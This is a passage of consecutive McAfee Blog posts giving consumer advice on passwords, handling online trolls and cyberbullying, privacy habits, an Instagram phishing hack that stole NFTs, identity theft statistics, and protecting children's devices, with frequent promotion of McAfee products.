If just the thought of creating and managing complex passwords has you overwhelmed, outsource the work to a password manager! These are software programs that can create random and complex passwords for each of your accounts, and store them securely. This means you don’t have to remember your passwords – you can simply rely on the password manager to enter them when needed.

Tricks:

  • Look for security software that includes a password manager
  • Make sure your password manager uses multi-factor authentication, meaning it uses multiple pieces of information to identify you, such as facial recognition, a fingerprint, and a password.

Boost your overall security

Now that you’ve made sure that your passwords are bulletproof, make sure you have comprehensive security software that can protect you from a wide variety of threats.

Tricks:

  • Keep you software up-to-date and consider using a web advisor that protects you from accidentally typing passwords into phishing sites.

The post 5 Tips For Creating Bulletproof Passwords appeared first on McAfee Blog.

6 Ways to Help Your Kids Deal with Haters and Harassers Online

By McAfee

Imagine, if you will, a person goes online each day with the sole mission to trigger confrontation and provoke conflict. Sounds bizarre and exhausting, doesn’t it? Sadly, that’s precisely what online trolls hope set out to do. And while trolls often target adults, when they target kids, the emotional impact can be confusing and painful. 

What is a troll?

A troll is a person who posts inflammatory messages in an online forum to purposefully cause confusion or harm to other users online for no reason at all. 

A 2021 Pew Research report found that nearly 41 percent (four in ten) Americans have encountered online harassment. Additionally, 55 percent think it is a “major problem.” Seventy-five percent of the targets of online abuse say their most recent experience was on social media.  

Bullies vs. Trolls

It’s important to differentiate bullies and trolls. While both cause harm, bullies often know their targets. Trolls, however, amplify the emotional complexity of online harassment by targeting strangers. Their goal is to anger and exhaust people with name-calling, body shaming, political or gender bashing, and other forms of emotional abuse.  

Helping kids understand, process, and respond in a healthy way to this kind of cruel behavior is, no doubt, a challenge all parents face today. So, what can we do? There are a few things.  

6 Ways to Help Kids Starve the Trolls

1. Prepare. Consider taking the time to discuss this important topic with your child. If they have yet to encounter a troll, it won’t be long. Define what a troll is, what their motives might be, and the different ways they wreak havoc online. For a few conversation starters, google “trolls and motives.” You will find that, among other reasons, trolls incite mayhem online to attract attention, exercise control, and hurt and manipulate others. In fact, some studies show trolling is associated with (among other personality disorders) psychopathy, Machiavellianism, and narcissism.

Helping your kids understand these personalities—and not internalize a troll’s hurtful comments—will take time and consistency.  

2. Parental Controls. One way to help your kids steer clear of trolls is parental controls. This level of software will block apps and filter websites trolls might frequent. In addition, parental controls will generate online activity reports and help parents limit screentime, both factors in reducing online conflict. 

3. Starve the trolls. It’s human nature. We want to strike back hard and fast with an epic comeback when we’re attacked online. However, studies show that the best way to deal with a troll is to ignore or starve them. Trolls feed on angry reactions so arguing is like serving them a chocolate sundae.  Instead, consider coaching your child to take a deep breath, step away from their devices, process the troll’s motives, and lastly, not engage. This will not only starve the troll, hopefully, it will also help your child build self-control.  

4. Exercise your power. Is it tough to ignore the trolls? You bet! However, muting, blocking, and reporting is still a way for kids to exercise their power. A good reminder to relay to kids: While the internet may be free and open to everyone, your child’s profile, page, or blog belongs to them. It is not a democracy that requires them to tolerate free speech or abusive behavior. Encourage your child to exercise their power and voice by using the reporting tools—unfollow, mute, block, report—designed to help them feel secure and safe online.  

5. Make accounts private. Many trolls tend to operate under anonymous names and use hidden IP addresses. For that reason, encourage your child to limit their online circles to friends only. While this may not ward off all trolls, it will reduce their chances of getting through the gates. This is especially important for children who play video games and chat online with unknown online players who may be trolls. Remind them to create private accounts on social networks and to keep all personal information private.  

6. Take appropriate action. If a trolling situation escalates to stalking or threats, report it to authorities immediately. A great place to learn more about trolling is the Crash Override Network, an exhaustive list of resources for victims of online harassment. Note: Be sure to take screenshots of the abusive posts, so you have proof in case the person attempts to edit or delete them. 

It’s easy to forget that each time your child logs into a device, they step into a literal worldwide web of strangers with diverse behaviors and agendas. Taking time to talk about trolls—before your kids rush to scroll Tik Tok or play Fortnite—will help equip them to deal with this growing threat.     

The post 6 Ways to Help Your Kids Deal with Haters and Harassers Online appeared first on McAfee Blog.

Aussie Children Have 2nd Highest Rate of Cyberbullying, Time To Focus on Digital Parenting

By Alex Merton-McCann

Whether it was bush fires, Covid, floods, or the Ukraine conflict, the news agenda over the last two years has been jam-packed. So, when McAfee released the findings of their first Global Connected Family Study, it was clear to me that connecting safely online needs to make it back into the news. 

Over 15,000 parents and 12,000 children aged 10-18 from 10 countries (including Australia) were interviewed for the study with the goal of finding out how families both connect and protect themselves online. So, let me share with you the results that need to spring us into action. 

  • Aussie children report the 2nd highest rate of cyberbullying (24%) out of the 10 countries surveyed. US children reported the highest rate. The average for all countries was 17%. 
  • Aussie parents are not completely aware of what’s happening in their children’s digital lives with just 20% nominating that their child had experienced cyberbullying while in fact 24% had experienced it. 
  • Children want to feel safe online and 73% of those surveyed look to their parents more than any other resource for help however parents are struggling to deliver. 
  • Parents are more inclined to protect their daughters online than their sons. Girls aged 10-14 were more likely to have parental controls on their PCs/laptops in almost every country surveyed. 
  • Children and teens want their privacy online and more than half (59%) will take steps to actively hide their online activity from hiding their browsing history to omitting details about what they are doing online. 

What Can We Do About It? 

I’m the first to admit that being a digital parent can be incredibly overwhelming. Staying abreast of the latest trends, apps and social media platforms can seem like a full-time job! And let’s not forget the latest threats and risks too. But findings, like the ones above, do have a way of shaking up priorities and do serve to provide clarity on where we need to focus our attention as parents.  

So, let’s break it down into 5 steps that you can take to ensure you are minimising the negativity and risks your kids may experience online: 

1. Check Your Family’s Communication Culture 

Without a doubt, one of the best things you can do for your family is create a culture where honest and genuine communication is a feature of everyday life. If your kids know they can confide in you, no matter what the problem is, then they are far more likely to come to you before a problem such as cyberbullying can feel unsolvable.  

2. Commit to Understanding Your Kids’ Online World 

It’s impossible to set boundaries and appreciate the risks in the digital world, if you don’t really know what your kids are dealing with. You may have little natural interest in joining Kik, Snapchat or Instagram but if you kids use it – then you know what you need to do! And if your kids can see that you are more actively involved online and using similar platforms, they will be more likely to come to you if they experience a problem. 

3. Introduce A Family Technology Contract 

In my opinion, one of the biggest causes of issues online is the fact that children are given internet-enabled devices that require adult levels of maturity and problem-solving skills. But let’s keep it real – that horse has bolted – most of our kids have phones in their pockets! So, the best way of managing this is to introduce a family technology contract.  

Now this can be as simple or complex as you feel is necessary for your tribe. You may want to insist on just a few rules such as not sharing passwords with friends, seeking permission before downloading apps, and always being kind online. You could simply write these on a piece of paper and have your kids sign it. Whatever works for you but remember, the research is showing that our kids are looking to us to help keep them safe online, so include as much here as you think your kids need. And of course, these need to be age-appropriate. I love this one for under 5’s from our eSafety Commissioner and this one is great for tweens and teens from The Modern Parent. 

4. Talk Cyberbullying (And Empathy) With Your Kids 

Bullying has existed long before the internet was even a word so unfortunately, it isn’t going anywhere. But coupled with the intensity and very public nature of the online world, it can be devastating. In my opinion, the key to cyberbullying is prevention. So, ensuring your kids know they can come to you with any problem, having a tight connection with your child so you can pick when things are ‘off’ and arming them with a basic cyber safety toolkit (not sharing passwords, privacy settings on, being kind online & having time away from devices) is essential.  

One of the ways we can also keep our kids from making mistakes online is by teaching them empathy. If kids haven’t developed empathy, then they make decisions based solely on their own desires – without any consideration for others. Many experts believe that it is the absence of empathy that leads directly to bullying.   

So, be a role model and start weaving the good old saying ‘do unto others as you would like them to do to you’ into your family dialogue.  

5. Consider Parental Controls & Protection Software 

The research findings are very clear: our kids want us to take charge of their online safety. So, let’s get technology working for us so we can keep them safe. 

Parental controls are not the silver bullet but when they are used in conjunction with proactive parenting then they can be transformative. McAfee’s Safe Family offers parents the ability to monitor device activity, limit screentime, block apps, and filter websites. This is a great way of teaching boundaries and limits while also giving yourself peace of mind that your kids are as safe as possible. 

Investing in comprehensive protection software for your (and your kid’s) devices is another way of adding a layer of protection to their online world. Comprehensive security software like McAfee’s Total Protection will protect against dangerous downloads, viruses, malware, online threats, and visits to risky websites. It will also encrypt the files on your computer and help manage your passwords! A complete no-brainer!!  

So, please don’t be overwhelmed and don’t even aim to be the perfect digital parent! Break it down and do the best you can because protecting our kids online needs to be a top priority. So, as soon as possible – check your family communication, take some time to understand your kids’ online world, put a digital contract in place, talk a little, and use some parental controls. But please do not forget about the power of role modeling. As parents, we are our kids’ biggest influencers so it might just be time for you to up your own digital safety game too!! 

Till next time. 

Stay safe everyone! 

The post Aussie Children Have 2nd Highest Rate of Cyberbullying, Time To Focus on Digital Parenting appeared first on McAfee Blog.

Are You Playing A Role In Protecting Your Online Privacy?

By Alex Merton-McCann

Like most things in life, online privacy is a 2-way street. As consumers, we expect the companies we deal with online to manage and safeguard our data to a super professional level however we also have a role to play here too. So, this Privacy Awareness Week (PAW), let’s focus on what we can do to ensure our personal information is kept as secure, and private as possible. 

Privacy Awareness Week 

There’s nothing like a dedicated ‘week’ to renew our focus and in my opinion, this year’s PAW does just that. This year’s theme is – The Foundation of Trust – we all have a role to play, a great reminder of how it’s up to all of us to ensure we manage online privacy. There’s no doubt that managing our privacy is low on the to-do list for many. And I get it – we’re all strapped for time, and we don’t ever think privacy breaches will affect us. Well, my friends, I’m here to tell you that privacy breaches do happen. Identity theft is a reality of living life online. In fact, in 2020/21, nearly 155,000 Aussies had their identities stolen and they were the cases that were reported. But the good news is that if you take a proactive approach, you can minimise the risk of this ever happening. 

What You Can Do to Protect Your Online Privacy 

Believe it or not, most of your privacy action plan involves small steps that are, I promise, relatively painless. The most important thing here is that you need to commit to doing them. The last thing you want is to spend months dealing with the fallout from having your identity stolen. It’s exhausting, stressful, and absolutely worth avoiding. 

Without further ado, here’s your action plan: 

1. Passwords 

Strong and complex passwords are essential to keeping your online information tight. Ideally, a password should have between 8-10 characters and be a combination of letters – both lower and uppercase, numbers and symbols. Each online account should also have its own password too – which is a very overwhelming concept! Consider using a password manager such as McAfee’s TrueKey to help generate and manage passwords.   

2. Conduct An Audit of Your (and Your Kids’) Privacy Settings 

Ensure all the family checks their social media accounts to ensure they are set to private. This will mean that only their chosen friends can see their private information. Each social media platform will have its own ‘help’ page which provides specific steps on how to do this.  

3. Use Public Wi-Fi With Caution 

If you are serious about your online privacy, then you need to use public Wi-Fi sparingly. Unsecured public Wi-Fi is a very risky business. Anything you share could easily find its way into the hands of cybercriminals. So, avoid sharing any sensitive or personal information while using public Wi-Fi. If you travel regularly, consider investing in a VPN. A VPN (Virtual Private Network) encrypts your activity which means your login details and other sensitive information is protected. A great insurance policy!  

4. Use 2-Factor Authentication 

Adding an additional layer of security to protect yourself when accessing your online accounts is another great way of guarding your online privacy. Turn on two-factor authentication for Google, Dropbox, Facebook and whatever other site offers it. For those new to this option, this means that in addition to your password, you will need to provide another form of identification to ensure you are who you say you are. Most commonly, this is a code sent to your mobile phone or generated by a smartphone app. 

5. Consider a Search Engine that Doesn’t Track Your Every Move Online 

Most web surfers rely on Google for their searching but why not use a search engine that doesn’t collect and store the information? And there are loads of more ‘privacy focussed’ options to choose from. Check out DuckDuckGo, that doesn’t profile users or track or sell your information to third parties. 

6. Protect Your Digital Life 

Comprehensive security protection software is an easy way to help firm up your online privacy too as it does a great job of keeping malicious software (malware) at bay. Malware can wreak absolute havoc: from installing pop ups to scanning for personal information. And if you’re likely to click dodgy links (we’re all human after all), then this is a no brainer! Super-duper security software will also guard you against viruses and online threats, direct you away from risky websites and dangerous downloads and protect your smartphones and tablets too, it can also back up your files. McAfee’s LiveSafe protection software comes with a 100% guarantee to protect you against viruses. 

So, this Privacy Awareness week, please take the time to ensure you are doing all you can to nail your online privacy. And of course, please get your kids involved too. Do your research and find some stories of ‘real life’ people who have had their identity stolen to share around the dinner table because identity theft can absolutely happen to anyone! 

Till next time, 

Stay Safe! 

Alex 😊  

The post Are You Playing A Role In Protecting Your Online Privacy? appeared first on McAfee Blog.

This World Password Day, Here’s How a Password Manager Can Simplify Your Life

By McAfee

Passwords: we entrust our most important data to these strings of letters, numbers, and special characters. So, we should make sure our passwords are words or phrases that we can easily remember, right? While this might be the most convenient option,  there are more secure ways to digitally lock up your most sensitive personally identifiable information (PII). In celebration of World Password Day, we’re diving into how you can practice top-notch password security without compromising convenience.1  

The Nature of the Password 

Over the years, the password has remained a good first line of defense against cyberattacks. However, most of us tend to choose passwords based on memorable things from our lives, like family names or our pets’ birthdays. As it turns out, these details are easy for hackers to find on social media sites like Facebook or LinkedIn. It’s also human nature to opt for convenience, and for many people that means  setting easy-to-remember and easy-to-guess passwords. Plus, out of convenience, people often reuse passwords across multiple accounts and services. The downside is that if one account becomes compromised, all accounts become compromised. 

As an alternative to single-word passwords, many security experts advocate for passphrases over passwords. Passphrases are longer strings of words and characters that are easier for you to remember and harder for nefarious software and cybercriminals to guess than random strings of upper and lowercase letters, numbers and symbols. But, according to a study, the average American internet user was projected to have 300 online accounts by 2022.2 Can you imagine memorizing 300 different passphrases? We can all agree that sounds pretty unrealistic, so users tend to look for other solutions.  

Do You Save Your Password in a Browser?  

If the answer is yes, you may want to reconsider, as there are several risks associated with this practice. Although it’s convenient to have your browser save your passwords, they tend to do a lousy job of safeguarding your passwords, credit card numbers and personal details, such as your name and address. 

Let’s take Google Chrome, for example. Unlike most dedicated password managers, Chrome doesn’t use a primary password to encrypt all your credentials. (Note that some browsers do use one, and are therefore more secure, though you’ll still need to trust your browser provider.) This makes your Chrome-stored passwords relatively weak to “local” attacks. For example, if someone gets hold of—or guesses—your Windows password, they can then see all the logins stored in your browser’s password manager. 

Another consideration to note is that the security of all your accounts is tied to your browser account’s security. Let’s say you use the sync option to make your credentials available on all your devices. This means that logins are stored in the cloud and, though encrypted, if someone manages to hack into your browser account, they will gain access to all your logins.  

Keep Your Accounts Secure Without Compromising Convenience 

What can you do to help ensure your online profiles are kept safe without spending hours managing a complex list of passwords? Here are some easy ways to lock down your digital life without sacrificing convenience:  

Use a password manager to store unique, complex passwords for all your accounts 

A password manager is a software application that stores your passwords and other sensitive information. You can install it on computers or mobile devices and store all passwords in an encrypted file (or database). The best option is to use a password manager like McAfee True Key to store and create strong, random passwords for each site you visit. You’ll have one primary password that grants access to the rest of them—ideally, a long and random passphrase that you can remember. Once everything is set up, it should be seamless. As you log in to new sites, the password manager will offer to save your credentials for later use. 

Turn on two-factor authentication for every site that offers it 

One of the best ways to protect your accounts against unauthorized access is to turn on two-factor authentication for every site that offers it. Using two-factor authentication means a site will prompt you for a unique security code, in addition to your password, whenever you log in to an account for which you have enabled this feature.  

Two-factor authentication adds an extra layer of security by requiring another form of identification after you enter your username and password. Some services send a temporary passcode over text message. Others require the user to approve login attempts from new devices using an app. If someone steals your device or gains access to your account details, they’re out of luck unless they also have access to this second piece of information. Two-factor authentication is available on a wide range of websites and can help keep your accounts safe from would-be hackers, so you should always use it when available.  

Use a virtual private network (VPN) when out and about 

A VPN, or virtual private network, encrypts your data and masks your online behavior from snooping third parties. When you go to a website, your computer connects to the server where the site is hosted, and that website can see a certain amount of data about you and your computer. With a VPN, you connect to a private server first, which scrambles your data and makes it more difficult for digital eavesdroppers to track what you’re doing online. 

VPNs can provide users with greater peace of mind when on the go. Say you’re traveling on a business trip and need to connect to the Wi-Fi network provided by your hotel. Shifty characters often lurk on unprotected, free networks (such as those provided by hotels, coffee shops, airports, etc.) to lift PII from people handling sensitive emails, making banking transactions, or shopping online. McAfee Safe Connect VPN encrypts your online activity with bank-grade encryption to protect your data from prying eyes. With a premium paid plan, you can protect up to five devices at once and enjoy unlimited data protection.  

The Best of Both Worlds: Security and Convenience 

With your growing number of accounts all requiring passwords—emails, social media profiles, online banking—it’s no wonder that people tend to reuse passwords across multiple sites. This may be convenient, but it creates significant security risks if a suspicious actor manages to obtain one of your passwords and attempts to use it elsewhere. That’s why having strong passwords matters. 

Do yourself a favor and opt for a dedicated password manager that will auto-save and store your credentials for you, so you only have one password to remember. Who says security and simplicity can’t coexist?  

The post This World Password Day, Here’s How a Password Manager Can Simplify Your Life appeared first on McAfee Blog.

Instagram Hack Results in $1 Million Loss in NFTs

By McAfee

Imagine – your favorite brand on Instagram just announced a giveaway. You’ll receive a free gift! All you have to do is provide your credit card information. Sounds easy, right? This is a brand you’ve followed and trusted for a while now. You’ve engaged with them and even purchased some of their items. The link comes directly from their official page, so you don’t think to question it. Don’t fall prey to crypto scams, download reputable mobile security protection.

This is the same mindset that led to several Bored Ape Yacht Club (BAYC) NFTs being stolen by a cybercriminal who had hacked into the company’s official Instagram account. Let’s dive into the details of this scam.  

Sneaking Into the Bored Ape Yacht Club 

Bored Ape Yacht Club, the NFT collection, disclosed through Twitter that their Instagram account had been hacked, and advised users not to click on any links or link their crypto wallets to anything. The hacker managed to log into the account and post a phishing link promoting an “airdrop,” or a free token giveaway, to users who connected their MetaMask wallets. Those who linked their wallets before BAYC’s warning lost a combined amount of over $1 million in NFTs. 

Despite the large price tag attached to NFTs, they are often held in smartphone wallets rather than more secure alternatives. MetaMask, the crypto wallet application, only allows NFT display through mobile devices and encourages users to use the smartphone app to manage them. While it may be a good method for display purposes, this limitation provides hackers with a new and effective way to easily steal from users’ mobile wallets. 

BAYC does not yet know how the hacker was able to gain access to their Instagram account, but they are following security best practices and actively working to contact the users affected. 

N.F.T. – Not For Taking 

This scam was conducted through the official BAYC account, making it appear legitimate to BAYC’s followers. It is incredibly important to stay vigilant and know how to protect yourself and your assets from scams like these. Follow the tips below to steer clear of phishing scams and keep your digital assets safe:  

Ensure wallet security 

A seed phrase is the “open sesame” to your cryptocurrency wallet. The string of words is what grants you access to all your wallet’s assets. Ensuring that your seed phrase is stored away safely and not easily accessible by anyone but yourself is the first step to making sure your wallet is secure. 

Protect your privacy 

With all transactional and wallet data publicly available, scammers can pick and choose their targets based on who appears to own valuable assets. To protect your privacy and avoid being targeted, refrain from sharing your personal information on social media sites or using your NFT as a social media avatar. 

Look out for phishing scams 

Phishing scams targeting NFT collectors are becoming increasingly common. Be wary of any airdrops offering free tokens in exchange for your information or other “collectors” doing the same. 

Phishing scams tend to get more sophisticated over time, especially in cases like the Bored Ape Yacht Club where the malicious links are coming straight from the official account. It is always best to remain skeptical and cautious, but when in doubt, here are some extra tips to spot phishing scams: 

  • Is it written properly? A few spelling or grammar mistakes can be common, but many phishing messages will contain glaring errors that professional accounts or companies wouldn’t make. If you receive an error-filled message or promotion that requires giving your personal information, run in the other direction. 
  • Does the logo look right? Scammers will often steal the logo of whatever brand or company they’re impersonating to make the whole shtick look more legitimate. However, rarely do the logos look exactly how they’re supposed to. Pay close attention to any logo added in a message or link. Is the quality low? Is it crooked or off-center? Is it almost too small to completely make out? If yes, it’s most likely not the real deal. 
  • Is the URL legit? In any phishing scam, there will always be a link involved. To check if a link is actually legitimate, copy and paste the URL into a word processor where you can examine it for any odd spelling or grammatical errors. If you receive a strange link via email, hover over it with your mouse to see the link preview. If it looks suspicious, ignore and delete it. Even on mobile devices, you can press and hold the link with your finger to check out the legitimacy of the URL. 

As crypto and NFTs continue to take the world by storm, hackers and scammers are constantly on the prowl for ways to steal and deceive. No matter the source or how trustworthy it may seem at first glance, always exercise caution to keep yourself and your assets safe! 

The post Instagram Hack Results in $1 Million Loss in NFTs appeared first on McAfee Blog.

A Guide to Identity Theft Statistics for 2022

By McAfee

There’s a digital counterpart for nearly everything we do, which means more of our personal information is online. And although this tends to make our lives easier, it opens the door for information to land in the wrong hands. Identity theft happens when someone uses your personal identifiable information (PII) for their own monetary or personal gain. Sensitive data like credit card numbers and Social Security numbers can be incredibly valuable if it gets into the wrong hands.  

The good news is that you can take steps to minimize the risk of identity theft. This article breaks down some of the most interesting fraud statistics and trends about identity theft in the United States and offers ways to protect your personal data from cybercriminals. 

Identity theft by the numbers

The number of identity theft cases reported to the Federal Trade Commission (FTC) has increased in the last five years. According to the FTC’s Consumer Sentinel Network (CSN) report, the number of reported cases more than doubled from 2019 to 2020.  

One possible reason for this upward trend is the coronavirus pandemic. Congress passed legislation that included more than $5 trillion in various government benefits. This money was helpful to out-of-luck Americans, but it was also extremely attractive to scammers who used the opportunity to create fake identities and steal unemployment checks. In fact, the most common type of identity theft this past year was government documents and benefits fraud 

What else do the numbers say about the rise in identity theft? Let’s take a closer look: 

These statistics only scratch the surface, though. Keep reading to learn more about the latest identity theft data and what you can do to protect your personal information.  

How common is identity theft in the U.S.?

Identity theft is a huge issue in the United States, and it doesn’t seem to be going away anytime soon. Fraud reports show that the number of identity thefts in the U.S. continues to grow and grow. The graph below shows the number of identity theft reports from the first quarter of 2017 to the first quarter of 2021.  

The reported instances of identity theft have risen sharply from just over 100,000 in the first quarter of 2017 to well over 500,000 in the first quarter of 2021. 2020 had the sharpest increase in reports, as cybercriminals did their best to capitalize on the pandemic to take people’s government benefits 

Number of Identity Theft Reports from 2017-2021

Identity theft, by state  

Not every state is affected by ID theft equally. Where you live can have a big impact on your likelihood of experiencing identity theft. The graph below shows the amount of identity theft cases reported to the FTC per 100,000 residents for each state in the U.S.  

States with the Highest Rates of Identity Theft

With a closer look, the five states with the most identity theft reports include Georgia, Louisiana, Illinois, Kansas, and Rhode Island, which takes the top spot. The number of reports in Rhode Island more than doubled in 2021, from 1,191 in 2020 to 2,857.  

At the other end of the spectrum, South Dakota remained the state with the lowest occurrence of identity theft, with only 76 residents per 100,000 experiencing it.  

State Rankings by Identity Theft

Here’s a list of the 20 metro cities where you have the highest chance of having your identity stolen. 

Top 20 Metro Areas With the Most Identity Theft

Who are the victims of identity theft?

Anyone can become the victim of identity theft, in large part because so much of our information is online. However, certain age groups are more likely to experience different types of scams 

For example, baby boomers are more likely than Generation Z to benefit from government programs. This makes them more susceptible to scams like benefits fraud (where a criminal poses as someone else to steal government benefits).  

On the other hand, younger generations like millennials have grown up with the internet, and activities like shopping online are more frequent. This makes them more susceptible to identity theft through credit card fraud 

Here’s a breakdown of the most common identity theft types from various generations:  

Number of Reports By Generation

Types of identity theft

There are several different types of identity theft, ranging from stolen financial information to compromised health care data. Some forms are pretty straightforward. For instance, credit card fraud occurs when somebody steals your credit card number and uses it to buy things. Others, like medical identity theft, might be a bit harder to recognize.  

Here’s a list of five of the most common types of identity theft 

  • Financial identity theft: This form of identity theft is exactly what it sounds like and involves a criminal stealing your financial information. For instance, your credit card number can be stolen and used to make a purchase.  
  • Medical identity theft: With medical identity theft, someone steals your personal information to obtain health care services. An example is someone else using your identity to obtain prescription drugs. 
  • Criminal identity theft: This form of identity theft occurs when someone else uses your name when arrested. You’ll know this has happened to you if you receive a court summons, for instance, that you had no involvement with. 
  • Synthetic identity theft: A rising form of identity theft, synthetic identity theft is when someone creates a fake identity using someone’s real information. For instance, an imposter might create a fake identity using someone else’s real birthdate and Social Security number to apply for a loan. 
  • Child identity theft: With child identity theft, a criminal uses a minor’s personal information to commit bank fraud or another form of identity theft. 

Although these are five of the most common types of identity theft, they can serve as umbrella terms for more specific forms of fraud. The diagram below shows the number of reported fraud cases of these various types of identity theft In 2021. 

Most Reported Forms of Identity Theft in 2021

While the internet has made our day-to-day lives more convenient, it’s also made it much easier for scammers to steal our personal information. Identity theft has become increasingly more common in the United States over the past five years.  

The more you use the internet, the more opportunities scammers have to steal your data and sell it on places like the dark web. Social media platforms, e-commerce businesses, banking companies, and a host of other online businesses can store your information for a variety of reasons.  

If you use the internet for online shopping, for instance, there’s a good chance a large number of databases stored your personal and financial data. While businesses use your information to give you a better online experience, scammers can also access it to steal your identity.  

The graph below shows the growth of different types of identity theft from 2017 to 2021.  

Type of Identity Theft Trends 2017-2021

What should I do if I think I’m a victim of identity theft?

Criminals use many tricks to get your information. Scammers or hackers might send phishing emails pretending to be the IRS, snoop around social media pages for password clues, get info through a data breach, or simply buy information on the dark web 

Here are a few things you can do if you believe you are the victim of identity theft 

  • Be on the lookout: To avoid identity theft, you’ll want to be alert for signs that someone has stolen your identity. Check your bank statement and credit report regularly to ensure no extra charges to your account. Pay attention to red flags like bills that arrive at your home with your information but someone else’s name, mysterious calls from debt collectors, or emails from new accounts for online services you don’t remember starting.  
  • Reach out to local law enforcement: Some banks may make you show them a police report before they reimburse you for any fraudulent charges or withdrawals. 
  • Contact the company where your ID is being used: Let the businesses where your information is being used know what’s happened. For instance, you’ll want to contact your bank and cancel your credit cards if you find out a criminal is using them. 
  • Get in touch with the three big credit bureaus: Call or message TransUnion, Equifax, and Experian right away. They may be able to diminish the impact an identity thief has on your credit score.  
  • File a report with the FTC: Reporting identity fraud to the FTC can help spread awareness of scams and identity theft tactics so others don’t fall victim to them.  
  • Visit the Identity Theft Resource Center: The ITRC has tools and information to help you protect yourself against identity theft and recover from it.  

We’re here to help protect your personal information

The internet makes our lives easier in many ways. Although identity theft is rising, you shouldn’t let online scams prevent you from enjoying these digital conveniences. Identity thieves are an unavoidable part of using the internet, but you can greatly limit your risk of falling victim to cybercrime if you know what to watch out for and you’re smart online.  

Recognizing the signs of identity theft can help you stay ahead of fraudsters, and investing in McAfee Identity Protection services can offer another layer of protection. When you sign up for our identity protection services, you get perks like $1 million in identity theft protection insurance and email address and bank account monitoring. With our help, you can continue to use the internet with confidence. 

The post A Guide to Identity Theft Statistics for 2022 appeared first on McAfee Blog.

What’s a Parent to Do? Closing the Protection Gap between You and Your Children.

By McAfee

Hands down, children look to their parents to keep them safe online more than anyone else, which begs the question—what’s a parent to do?

Our recent study on connected families found that nearly three-quarters of children said their parents were best suited to teach them about staying safe online, nearly twice than teachers at school (39%) and more than twice over for online resources (34%). Parents recognize their role as a protector online as well, with an overwhelming 90% of parents worldwide agreeing that they’re the primary source.

However, our study also found that parents could be taking more steps to protect themselves online, let alone taking steps for their children. In fact, when looking at how parents protect themselves and then if they protect their children the same way, a distinct gap appears.

Online Security Habits Across Devices

Figures that were already low for relatively straightforward and relatively easily employed safety measures drop yet lower for children—such as installing antivirus software, protecting the computer with a password, or sticking to reputable online stores when shopping.

For example, on computers and laptops, note the 11% drop in antivirus usage, the 14% drop in device password/passcode protection, and the 9% drop in regular updates to the operation system.

This trend continues when the study looked at mobile device protection for parents and children. The numbers were similarly low, and sometimes lower than the rate of protection on PCs and laptops. For example, while 56% of parents said that they protect their child’s smartphone with a password or passcode, only 42% said they do the same for their child’s smartphone—a further 14% drop.

Across the board, parents reported protecting a child’s smartphone to a lesser degree than they protect a child’s computer or laptop—notably when it comes to installing antivirus on phones, to a figure of 19% less (57% to 38%).

Mobile Device Usage Among Children

What’s striking about this is how tweens and teens access the internet today. Our report found that 74% of them said that their smartphone was their most important device (followed by their gaming console at 68%). Moreover, the rate at which they use their smartphones indicates that these devices are their primary onramp to the internet. By ages 15 to 16, some 90% of children worldwide report using a smartphone.

Given these findings, two important points stand out for parents:

  • First, the steps that parents take to protect themselves aren’t always done for their children—even though their children look overwhelmingly to them for protection online.
  • Second, children are going largely unprotected on the devices they use to access the internet the most—their smartphones.

Misconceptions about online protection may play a role in these lax measures. Two additional findings may indicate why this is:

  • 49% of parents think a new phone is more secure than a new computer.
  • 59% of tweens and teens thought new phone was more secure as well.

Both perceptions deny the reality that smartphones, and the people using them, are subject to hacks and attacks just like with any other device that connects to the internet. As such, smartphones call for protection too.

6 Steps to protect you and your family online

So, what’s a parent to do? They can take a few basic actions that will go a long way toward safeguarding themselves and their families online:

1) Protect yourselves

It used to be that we could load antivirus on our devices and go on our way with confidence. That’s not the case anymore. While antivirus is still a cornerstone of protection, it’s just a part of overall online protection. Comprehensive online protection software protects more than your computer or smartphone, it protects you.

For example, ours offers all-in-one protection for your personal info and privacy for peace of mind against data breaches—along with further features that can remove your data from some of the riskiest data broker sites that are selling it online. Other features include an online protection score that shows you just how strong your security is, along with simple guidance that can help seal up any gaps.

In all, online protection is the place to start when looking after yourself and your family online, whether that’s on a computer, laptop, or phone—with particular emphasis on phones, given the way parents and children alike rely on them so strongly.

2) Protect your identities

Identity theft can affect anyone, even the youngest of children. Our study found that 15% of children experienced attempted account theft, while 28% of parents reported it happening to them. An identity protection service like ours can monitor your family’s accounts and personal info for unauthorized or suspicious activity—and help you restore a compromised identity with the help of a pro.

3) Protect your devices

In and above using online protection software, there’s also the security of your devices to consider too. After all, devices can get lost or stolen. Take steps to protect your devices by ensuring they’re locked with a PIN or other protection like facial recognition. For your apps, use two-factor authentication wherever possible for extra protection should your device end up in someone else’s hands.

4) Protect your accounts

Similarly, you can take steps to protect your online accounts by using strong, unique passwords for each one. That means no repeats. This makes it far more difficult for hackers to compromise multiple accounts, such that if one password is compromised in a data breach, any potential damage is limited to just that one account in question.

Taking care of that yourself can be a lot of work, given all the accounts you likely have accounts across all the shopping and banking, not to mention your apps. It gets even more involved when you add all your children’s accounts into the mix. Yet there’s good news, a password manager can do all the work by creating and storing strong, unique passwords for you.

5) Keep updated

Updating your operating systems and apps can keep you current with the latest features and enhancements, and help you keep one step ahead of hackers as well. Many updates to operating systems and apps include security fixes and enhancements, which can keep bad actors from taking advantage of any exploits or loopholes on your devices. Many devices and apps make it easy with an auto-update feature. If any of yours offer auto-updating, take advantage.

6) Keep talking

Completely aside from software, apps, and updates, another way to keep your kids safe online is through conversation. When talking with them about their day, weave in a few questions about what’s happening online. What are their favorite games and apps right now? What shows are they watching? Is there a funny post or video they want to share?

Questions like these, simple as they are, can make talking about their life online seem more normal—the ups and downs of it alike—and provide you with opportunities that will help you foster strong decision-making skills that they can carry into adulthood.

Closing the gap

With our study uncovering a clear gap in protection, parents can rest assured they can close it with a few relatively straightforward steps, making everyone in the household safer than before.

This was just one of several findings from our global report on connected families. Others include noteworthy differences across nations, such as which nations report the highest levels of cyberbullying and which nation has nearly 100% of its young children saying they use a smartphone regularly. Yet more findings reveal insights into screen time, video game usage, and a breakdown of the top online activities for teens—and many more ways families are growing up together through their lives online.

Again, what’s a parent to do in light of all this?

Our blog is a great place to start. It offers parents and families a terrific resource when they have questions about life online, along with further resources about online protection that simply make for good reading. Our aim is to help you get thinking about what’s best for your family and the steps you can take to see it through, all so that you can make everyone’s time online safer and more enjoyable.

The post What’s a Parent to Do? Closing the Protection Gap between You and Your Children. appeared first on McAfee Blog.

Life Behind the Screens of Parents, Tweens, and Teens: McAfee’s Connected Family Study

By McAfee

How do parents and children connect and protect themselves online? We spoke with thousands of them around the world to find out.

